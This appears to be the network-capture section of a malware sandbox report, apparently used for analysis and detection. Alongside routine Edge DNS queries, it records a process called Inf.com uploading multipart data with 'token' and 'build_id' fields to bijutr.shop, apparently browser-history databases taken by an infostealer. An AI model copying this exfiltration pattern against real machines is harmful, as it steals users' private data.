                                                                                                                                                                                                                                                                                                  Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  21192.168.2.549941172.64.41.34432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  22192.168.2.549942172.64.41.34432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  23192.168.2.549944188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FKFKXLNYM7GV37Q9ZCBA
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 207993
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 5a 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 5a 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 46 4b 58 4c 4e 59 4d 37 47 56 33 37 51 39 5a 43 42 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------FKFKXLNYM7GV37Q9ZCBAContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------FKFKXLNYM7GV37Q9ZCBAContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------FKFKXLNYM7GV37Q9ZCBACont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                  Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:33 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  24192.168.2.549940162.159.61.34432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 10 6d 73 65 64 67 65 65 78 74 65 6e 73 69 6f 6e 73 02 73 66 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 2f 00 0c 00 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: msedgeextensionssftludldeliverympmicrosoftcomA)/+
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:32 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f8718b91ab0436c-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:32 UTC468INData Raw: 00 00 81 80 00 01 00 04 00 01 00 01 10 6d 73 65 64 67 65 65 78 74 65 6e 73 69 6f 6e 73 02 73 66 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0e 10 00 34 04 73 74 61 72 02 73 66 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 08 64 65 6c 69 76 65 72 79 c0 33 c0 52 00 05 00 01 00 01 51 80 00 26 11 63 64 70 2d 66 2d 73 73 6c 2d 74 6c 75 2d 6e 65 74 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 92 00 05 00 01 00 00 01 2c 00 38 04 73 74 61 72 02 73 62 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 09 65 64 67 65 73 75 69 74 65 03 6e 65 74 00 c0 c4 00
                                                                                                                                                                                                                                                                                                  Data Ascii: msedgeextensionssftludldeliverympmicrosoftcomA4starsftludldeliverympmicrosoftcomdelivery3RQ&cdp-f-ssl-tlu-nettrafficmanagernet,8starsbtludldeliverympmicrosoftcomedgesuitenet


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  25192.168.2.549954188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Z5P8GDTJM7G4E3O8Q1DB
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 68733
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------Z5P8GDTJM7G4E3O8Q1DBCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
